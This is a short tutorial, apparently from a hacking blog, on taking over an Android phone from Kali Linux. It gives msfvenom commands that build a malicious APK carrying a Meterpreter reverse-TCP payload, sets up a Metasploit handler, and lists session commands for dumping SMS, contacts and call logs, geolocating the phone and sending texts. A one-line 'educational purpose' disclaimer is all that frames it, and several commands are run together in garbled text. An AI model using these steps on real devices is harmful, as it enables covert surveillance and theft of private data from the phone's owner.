Hack Android phone using Kali Linux Hy, today I will show you how to Hack Android phone using Kali Linux. Android phones have a la...
Hack Android phone using Kali Linux
Hy, today I will show you how to Hack Android phone using Kali Linux.
Android phones have a large share in smartphone market. So targeting android phone is very good option to hack. In this tutorial I will using KALI Linux as attacker PC and my Coolpad Note 3 as victim phone which I am going to hack.
Things We Need
- Kali Linux installed.
- An Android phone.
- Brain
- Open Kali terminal.
- We will be going to use MSFVENOM to create a malicious apk file that we will install on the android phone.
- Paste these commands in terminal .
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > /root/CyberSucks.apk4. Change the LHOST to you local IP address and press enter.
6. Open new terminal and enter msfconsole
7. After opening metasploit console type these following commands
which are used to create payload handler which will create connection
between victim and kali PC.
Change the LHOST to your local ip address. Also don't close theuse exploit/multi/handler
set payload android/meterpreter/reverse_tcpset lhost 172.16.27.207exploit
this terminal.
9. After the victim open the file you will get a meterpreter session.
Now open the msfconsole terminal and use session -i 1command
to access the session.
10. In the meterpreter session you can use various commands that are
given below to play different types of tricks on the victim phone like
capturing a photo,screenshot,call logs,sms logs,sending a sms.
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information
Note:
- Don't close the msfconsole terminal.
- This is only for educational purpose.
COMMENTS